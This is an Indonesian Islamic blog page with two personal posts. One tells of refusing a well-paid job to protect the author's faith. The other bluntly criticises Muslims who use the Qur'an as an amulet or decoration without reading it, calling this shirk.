Masuk waktu sholat Ashar, saya bangkit berdiri dari kursi. Dengan nada santai, saya (sengaja) berkata ringan  “Ashar yuk”. Dengan irama yang sama ringannya, dia membalas, “silakan…silakan…”. Jawaban yang sudah saya duga. Saya sholat, dia tetap tinggal di tempatnya duduk. Padahal sejak awal dia mengaku Muslim.

Waktu berjalan dan kami masih ngobrol. Hanya saja kali ini lebih terkesan satu arah. Dia bicara dan saya mendengarkan. Sampai tiba waktunya pulang, saya mengantar dia balik ke hotel tempatnya menginap. Kebetulan saat itu sedang terjadi demonstrasi di kota Makassar. Jalan-jalan ditutup dan di beberapa tempat terjadi kerusuhan. Mulailah dia mengomentari kondisi tersebut…

“Indonesia ini butuh pemimpin yang tegas. Kalau tidak, kondisi akan makin parah. Terbukti reformasi tidak berhasil. Sistem pemerintahan yang ada terbukti gagal mengatasi banyak masalah. Yang dibutuhkan sekarang adalah komunisme.”

Mendengar itu, selesai sudah semuanya. Saya tidak lagi tertarik bergabung dalam team mereka. Bukan karena iman saya yang kuat, tapi justru karena saya mengkhawatirkan lemahnya iman saya akan membawa saya terjerumus jauh jika saya berada di lingkungan mereka.

Sampai saya menurunkan dia di depan hotel dan besoknya dia terbang balik ke Jakarta, saya tidak menghubungi dia lagi. Lembar kontrak yang sudah saya tandatangani tidak pernah sampai ke tangannya. Dan sepertinya dia juga memaklumi “atmosfer” yang terjadi diantara kami, karena setelah itupun dia tidak pernah lagi menghubungi saya, baik via telepon atau e-mail.

Mudah-mudahan Allah melindungi saya, keluarga saya, orang-orang yang saya cintai, saudara-saudara dan sahabat-sahabat saya seiman serta seluruh ummat Muslim dari kerusakan akidah dan kontaminasi yang “berpakaian dan bertutur indah”.

“Gile, duit puluhan juta per-minggu ditolak. Hebat kamu ya!” | “Enak aja hebat. Saya ngiler berat dengan tawaran itu. Saya sudah membayangkan yang enak-enak. Dan suasana hura-huranya pasti menyenangkan sekali. Saya pasti akan menikmati punya duit sebanyak itu dan hura-hura seperti itu. Itulah sebabnya saya tolak. Bukan karena tidak suka, tapi karena saya khawatir bahwa saya akan menikmatinya.”

Sekali lagi, bukan kekuatan iman saya yang membuat saya menolaknya. Tapi justru karena saya masih merasa betapa lemahnya iman saya jika harus berada dalam lingkungan yang luar biasa “menyenangkan” seperti itu.

Semoga bermanfaat

Wassalam,

Perkawinan Silang Antara Kebodohan dan Kemalasan

Bismillahirrahmaanirrahiim…

Sudah sekian lama umat Islam jadi kaum yang “hina”, terutama di Indonesia. Eits, jangan marah dulu dibilang hina, coba perhatikan gejala-gejala kehinaan tersebut:

1. Pengangguran paling banyak orang Islam;
2. Orang miskin paling banyak orang Islam;
3. Pencuri paling banyak ngakunya orang Islam;
4. Penghuni penjara paling banyak orang Islam;
5. Orang bodoh paling banyak orang Islam;
6. Orang malas kebanyakan orang Islam;
7. Yang kecurian sendal di rumah ibadahnya sendiri cuma orang Islam;
8. Dan lain-lain, dan sebagainya, dan seterusnya.

Ada yang mau membantah? Tidak ada? Bagus, berarti Anda setuju. Silakan lanjut membaca.
Pokoknya segala jenis penyakit masyarakat didominasi oleh orang Islam. Jadilah umat Islam itu sebagai umat yang “digoblok-goblokin” oleh umat lain. Sudah bukan rahasia lagi, setiap kali umat non-Islam membicarakan mengenai umat Islam, yang ada hanya kehinaan. Gak ada bagus-bagusnya deh.

Apakah kita rela digoblok-goblokin dan dibully kiri-kanan seperti itu? Wuih, kita pasti akan menjawab secepat kilat “TIDAK!”. Tapi tenang dulu, pernahkah kita instrospeksi dan bertanya pada diri sendiri, “Siapa tahu kita memang pantas dihina? Mungkin saja kita memang bodoh?”.

ISLAM itu tidak sama dengan MUSLIM. Ajaran Islam sangat sempurna, agung, megah dan siapapun yang mempelajarinya dengan hati yang ikhlas, pasti akan jatuh cinta dan tergila-gila dengan ajaran Islam. Semakin dalam kita mempelajari Islam, semakin kasmaran kita. Semakin rindu hati kita untuk terus dan terus membaca “surat cinta dari surga” berupa Al-Qur’an yang begitu indah, dari DIA Sang Kekasih Yang Maha Pengasih.

Sayangnya, masih banyak MUSLIM yang tidak ber-ISLAM.

Semakin JAUH kita dari Allah, Rasulullah dan ajaran Islam, maka semakin DEKAT kita dengan kehinaan. Tidak ada di tengah-tengahnya, yang ada hanya hina atau mulia. Tidak ada itu yang namanya “jauh dari Al-Qur’an tapi tidak hina”. Enak aja nawar, hehehe. Intinya, tanda-tanda mendekatnya kita kepada kehinaan adalah ini nih: semakin jauhnya kita dari Al-Qur’an dan semakin malasnya kita mempelajari ajaran Islam.

Jadi maaf saja kalau saya mengatakan, orang yang hina memang pantas dihina. Bukan saya yang menghina loh, saya sih tidak berhak menghina siapa-siapa. Allah sendiri-lah yang akan menghinakannya. Allah sendiri yang akan merendahkan derajat kaum Muslim yang tidak ber-Islam.

Dalam kesempatan ini, saya ingin memberi contoh-contoh nyata betapa kejauhan kita dari Al-Qur’an dan Islam akan mendekatkan kita kepada kebodohan, sekaligus membuat kita pantas terhinakan. Inilah yang banyak dilakukan muslim yang tidak paham terhadap Kitab Suci mereka sendiri:

1. Al-Qur’an sebagai pajangan;
Hampir di setiap rumah orang Islam, pasti ada Al-Qur’an. Sayangnya, Al-Qur’an kebanyakan hanya dijadikan hiasan. Diletakkan dan disusun bersama buku-buku yang lain. Hanya sebagai simbol identitas bahwa “saya orang Islam”, itu tok. Tidak pernah dibuka, apalagi dibaca. Hayo ngaku, termasuk Anda atau bukan?

2. Al-Qur’an sebagai pengusir setan;
Al-Qur’annya sudah bukan di rak lagi, tapi ditaruh di samping bantal. Ndak dibuka sih, cuma ditaruh saja untuk nemenin bobo. Mungkin dia merasa dengan adanya Al-Qur’an di samping bantal, maka setan ndak berani ganggu tidurnya, jadi dia terhindar dari mimpi buruk. Kelakuan ini adalah hasil perkawinan silang antara kebodohan dan kemalasan.

Yang lebih bodoh lagi, kerap kali kita lihat orang tua-orang tua yang punya bayi, meletakkan Al-Qur’an di samping bantal bayinya yang lagi tidur, dengan keyakinan bayi itu akan aman dari gangguan roh jahat kalo ditemani Al-Qur’an. Ampun deh! Ajaran dari mana pula ini???

Sudah tahu anak bayi itu belum bisa membaca, kok dikasih Al-Qur’an? Dan sebagai informasi saja nih ya siapa tahu Anda belum tahu: Al-Qur’an TIDAK BISA membaca dirinya sendiri! Bokap-nyokapnya dong yang harus baca! Inilah kalo bodoh plus malas… *prihatin

3. Al-Qur’an sebagai penolak bala;
Potongan-potongan “tulisan Arab” yang diyakini sebagai potongan ayat-ayat Al-Qur’an digantung di pintu rumah, dengan keyakinan rumah tersebut akan aman dari bencana. Padahal belum tentu dia mengerti tulisan dan artinya. Bego kan?

4. Al-Qur’an sebagai pemancing rezeki;
Mirip-miriplah dengan poin ke-3 di atas. “Tulisan-tulisan huruf Arab” digantung di pintu rumah atau ditanam di halaman rumah, dengan keyakinan penghuni rumahnya akan kelimpahan rezeki. Mungkin dia pikir dengan menanam Al-Qur’an, nanti bisa tumbuh pohon emas. Padahal amalan-amalan pemancing rezeki sudah diajarkan dalam Islam, diantaranya rajin MEMBACA Al-Qur’an, sholat Dhuha, memperbanyak sedekah dan lain-lain. Ingat ya, MEMBACA Al-Qur’an! Bukan MENGGANTUNG Al-Qur’an, apalagi MENANAM. Jangan yang aneh-aneh deh…

5. Al-Qur’an sebagai jimat;
“Tulisan-tulisan huruf Arab” disimpan di dompet atau dikantongin, dengan keyakinan orang yang membawanya akan terhindar dari marabahaya. Yang lebih parah, dia juga yakin bisa kebal senjata. Ini sama bodohnya dengan penyembah berhala zaman jahiliyah. Sudah tahu itu berhala gampang dihancurkan, kok malah disembah-sembah? Nah, sudah tahu itu “jimat” gampang dirobek-robek, kok malah diyakini bisa bikin kebal senjata? Jimatnya saja tidak kebal, bagaimana orangnya mau kebal? Lucu ya? Iya!

Dan masih banyak lagi kelakuan “menyimpang” kaum Muslim terhadap Kitab Suci mereka sendiri.

Dalam Al-Qur’an, Allah jelas-jelas berfirman bahwa semua dosa bisa diampuni jika hamba-Nya bertobat sungguh-sungguh, KECUALI mempersekutukan Allah dengan yang lain. Itu namanya musyrik dan TIDAK ADA pengampunan dari Allah untuk dosa tersebut! Kita bisa bilang bahwa kita tidak mempertuhankan ayat-ayat itu, tapi PERBUATAN kita menyatakan demikian!

“Tapi kan tidak ada salahnya, toh ayat Al-Qur’an kok yang digantung.” | “Siapa bilang tidak ada salahnya? Justru itu salah besar. Itu dosa besar. Itu musyrik. Itu bodoh. Itu malas. Kalau mau terhindar dari gangguan setan, mau memancing rezeki, mau terlepas dari bahaya dll… ya Al-Qur’annya dibaca dong, trus sholat, dzikir, sholawat, sedekah trus meminta dan memohon hanya kepada Allah. Jangan membenarkan perbuatan-perbuatan itu hanya karena kita terlalu MALAS.”

Tidak ada tempat meminta dan memohon perlindungan selain daripada Allah. Dengan hanya mengandalkan ayat-ayat Al-Qur’an yang ditaruh-taruh, digantung-gantung, ditanam-tanam dan tidak pernah dibaca, itu sama saja kita mempertuhankan SEBUAH BUKU YANG BERTULISKAN BAHASA ARAB yang bahkan kita sendiri TIDAK MENGERTI apa arti tulisannya. Punya otak kan? Coba pikir sendiri betapa bodohnya perbuatan-perbuatan itu.

Wassalam,

Postingan Lebih Baru Postingan Lama Beranda